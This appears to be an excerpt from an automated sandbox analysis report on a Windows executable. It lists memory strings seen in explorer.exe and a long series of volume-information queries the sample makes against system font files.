Source: explorer.exe, 00000006.00000000.471499845.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.475830002.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.491701651.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.484004777.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466168727.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.501081842.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.484004777.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.555468985.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466551099.0000000001430000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: YProgram Managerf
Source: explorer.exe, 00000006.00000000.484004777.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.555468985.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466551099.0000000001430000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Users\user\Desktop\e6o7hKFmfC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
